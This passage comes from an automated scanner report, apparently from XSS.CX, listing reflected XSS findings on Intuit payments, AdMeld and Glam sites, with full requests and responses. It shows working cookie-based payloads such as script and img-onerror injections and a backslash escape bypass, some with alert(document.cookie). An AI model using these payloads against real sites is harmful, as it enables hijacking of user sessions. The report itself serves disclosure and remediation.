Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=T1u1XH4DfrzerP928diaQw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E07850A0805192AA117E3B164A0FB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116404

...[SNIP]...
<input id="testGroup" value="T16d2219"><script>alert(1)</script>d85e888e13e" type="hidden" />
...[SNIP]...

2.184. http://payments.intuit.com/support/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/support/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79ad"><script>alert(1)</script>e8785a94aac was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=i8iNytoY1Ui6tDFoAVhOcw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AFFB20A0805192AA117E35F81E813
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98215

...[SNIP]...
<input id="testGroup" value="T16c79ad"><script>alert(1)</script>e8785a94aac" type="hidden" />
...[SNIP]...

2.185. http://payments.intuit.com/support/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/support/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 77a3a<script>alert(1)</script>eb661626a4c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+fYnnrFufW+udQMJRBi-CA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C80060A0805192AA117E36100617F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98200

...[SNIP]...
<br />
A/B Test Group: T1677a3a<script>alert(1)</script>eb661626a4c<br />
...[SNIP]...

2.186. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/support/glossary.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b0496<script>alert(1)</script>bc940e2dae4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=V3muyf7UBAI0P+tkQ9nfKQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3E7D0A0805192AA117E3D2CDCAC4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140109

...[SNIP]...
<br />
A/B Test Group: T16b0496<script>alert(1)</script>bc940e2dae4<br />
...[SNIP]...

2.187. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/support/glossary.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb67a"><script>alert(1)</script>411f1d9182d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:46 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RRotOArxmPQIpIZcrWSlYg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:47 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC1E70A0805192AA117E30C0FAA74
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140123

...[SNIP]...
<input id="testGroup" value="T16bb67a"><script>alert(1)</script>411f1d9182d" type="hidden" />
...[SNIP]...

2.188. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/json/100/glamtoptier/300x250/1621082087

Issue detail

The value of the meld_sess cookie is copied into the HTML document as plain text between tags. The payload 2706a<img%20src%3da%20onerror%3dalert(1)>d1991c73d73 was submitted in the meld_sess cookie. This input was echoed as 2706a<img src=a onerror=alert(1)>d1991c73d73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/json/100/glamtoptier/300x250/1621082087?url=http%3A//www.highbeam.com/iframead/display.aspx%3Fsite%3Dgale.hbr.doc%26zone%3Dp5554%26kvps%3Dpage%3Dwall%3Bcat%3Dhbr_99%3Bpub%3Dp5554%3Bpos%3Dr2%3Bchannel%3D1000000025%3Bsz%3D300x250%2C300x600%3Btile%3D2%3Bord%3D19528853%3B%26id%3Dad-r2c6cce%2522%253balert%281%29//c18ae8de3b0&callback=GlamAdmeldRenderJsAd&floor_price=2&container=ADMELD64226450561 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843d2706a<img%20src%3da%20onerror%3dalert(1)>d1991c73d73

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbXRvcHRpZXIiLCAgYWQ6ICAgICAgICAgICAtMSwgIG5ldHdvcms6ICAgICAgImFkbWVsZHBzYSIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjAtMCIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiYTI2ZGIwZmYtMzFiNC00ZDE0LWEzYWYtMmI5NDA5NjVkZmQ5IiwgIHVzZXI6ICAgICAgICAgIjYzZTJjNzc4LWYzZTEtNGQwMi04ZWUyLTI2MWRmYTY0ODQzZDI3MDZhPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPmQxOTkxYzczZDczIiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICIxNjIxMDgyMDg3IiwgIGRpdjogICAgICAgICAgImEyNmRiMGZmLTMxYjQtNGQxNC1hM2FmLTJiOTQwOTY1ZGZkOSIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmhpZ2hiZWFtLmNvbS9pZnJhbWVhZC9kaXNwbGF5LmFzcHgiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiZXJyb3IiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAwLCAgYWNjb3VudF9pZDogICAwLCAgbmV0d29ya19uYW1lOiAiQWRNZWxkIFBTQSIsICBwdWJsaXNoZXJfbmFtZTogImdsYW0iLCAgZWNwbTogICAgICAgICAiMi4wMCIsICBmZWNwbTogICAgICAgICIyLjAwIiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICIxNjIxMDgyMDg3IiwgIHJ1bGU6ICAgICAgICAgIjE2MjEwODIwODciLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMzk4NjkzLCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjM5ODk3NywgImJ1eSI6NTAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHViZW1vZ3VsIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NDY3MTIyNiwgImJ1eSI6ODQ3MSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJYQS5uZXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozOTUzMzU2LCAiYnV5IjoyMDM2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkFjdWl0eSBBZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNDIzMzcxLCAiYnV5Ijo1MjEwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMTIifQ==
Content-Length: 1157
Content-Type: application/javascript
Date: Mon, 21 Mar 2011 16:42:21 GMT
Connection: close

GlamAdmeldRenderJsAd({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":300,"height":250,"container":"ADMELD64226450561","bid":0.00,"requestId":"a26db0ff-31b4-4d14-a3af-2b940965dfd9"
...[SNIP]...
<script type=\"text/javascript\" src=\"http://pixel.invitemedia.com/admeld_sync?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d2706a<img src=a onerror=alert(1)>d1991c73d73&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match\">
...[SNIP]...

2.189. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The value of the ctags cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11fe3\'%3balert(1)//d67229e693b was submitted in the ctags cookie. This input was echoed as 11fe3\\';alert(1)//d67229e693b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1621082087&adSize=300x250 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(document.cookie)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=1126612978600458511; ctags=None11fe3\'%3balert(1)//d67229e693b

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: application/x-javascript
Set-Cookie: bkpix2=1; expires=Mon, 21 Mar 2011 22:15:36 GMT; path=/; domain=.glam.com;
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Vary: Accept-Encoding
Cache-Control: max-age=450
Date: Mon, 21 Mar 2011 16:42:16 GMT
Connection: close
Content-Length: 55384

// 
// 

window.glam_session = new Object();
window.glam_session.country_code = null;
/*
*/

window.glam_session.edge = true;

window.glam_session.glam_sid='1126612978600458511';

window.glam_session.ctags='None11fe3\\';alert(1)//d67229e693b';

window.glam_session.country_code='US';

window.glam_session.dma='511';

window.glam_session.region_code='DC';

window.glam_session.sid_set=1;

window.glam_session.user_agent_type='2';

docu
...[SNIP]...

2.190. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The value of the glam_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb4fe\'%3balert(1)//bd6037062d2 was submitted in the glam_sid cookie. This input was echoed as eb4fe\\';alert(1)//bd6037062d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: application/x-javascript
Set-Cookie: bkpix2=1; expires=Mon, 21 Mar 2011 22:15:30 GMT; path=/; domain=.glam.com;
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Vary: Accept-Encoding
Cache-Control: max-age=450
Date: Mon, 21 Mar 2011 16:42:10 GMT
Connection: close
Content-Length: 55384

// 
// 

window.glam_session = new Object();
window.glam_session.country_code = null;
/*
*/

window.glam_session.edge = true;

window.glam_session.glam_sid='1126612978600458511eb4fe\\';alert(1)//bd6037062d2';

window.glam_session.ctags='None';

window.glam_session.country_code='US';

window.glam_session.dma='511';

window.glam_session.region_code='DC';

window.glam_session.sid_set=1;

window.glam_sessi
...[SNIP]...

2.191. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The value of the glam_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75435'-alert(1)-'29012ad1801 was submitted in the glam_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=g;cc=us;aft=p;ec=ron;p=0;p=1;!c=fem;!c=nptr;!c=r;!c=s;!c=sf;ec=tfm;ec=tpa;pec=fm;rmt=exp;rtbp=1;vec=fm;vpec=fm;atf=1;uatf=s;pfl=0;dt=s;!c=hagl;!c=hagn;afid=1621082087;dsid=1027200;;tt=j;u=b0021heurbg1oh7qpt9,f0f12sa,g10001s;sz=300x250;tile=1;ord=6778163411654532;;afid=1621082087;dsid=1027200;url=zetcbm;seq=1;ux=f-f12sa,tid-1,pid-heurbg1oh7qpt9,aid-2,g-64,1,;_glt=300:1:11:42:25:539:2011:3:21;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(document.cookie)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=112661297860045851175435'-alert(1)-'29012ad1801; ctags=None; bkpix2=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d9a61c18c39e371e68f8ec954f2210fb:1300254528"
X-Glam-Bdata: XGlamBData,nbt,lda,ln
X-Glam-AdId: 5000033641
X-Glam-Euid: 9a3cf32c10385c9cebc777ad0d7a3bfc
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 21 Mar 2011 16:42:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 21 Mar 2011 16:42:12 GMT
Connection: close
Content-Length: 4272

...[SNIP]...
iateInfo ) {
window.GlamGetAffiliateInfo = function(pName) {
var glam_info = new Object();
var glam_affiliate_vars = 'js_mode=show;_ge_=3^2^9a3cf32c10385c9cebc777ad0d7a3bfc;sid=112661297860045851175435'-alert(1)-'29012ad1801;browser=2;co=US;dma=511;;;;flg=64;;zone=/;nt=g;cc=us;aft=p;ec=ron;p=0;p=1;!c=fem;!c=nptr;!c=r;!c=s;!c=sf;ec=tfm;ec=tpa;pec=fm;rmt=exp;rtbp=1;vec=fm;vpec=fm;atf=1;uatf=s;pfl=0;dt=s;!c=hagl;!c=hagn;afid
...[SNIP]...

Report generated by XSS.CX at Thu Mar 24 07:04:33 CDT 2011.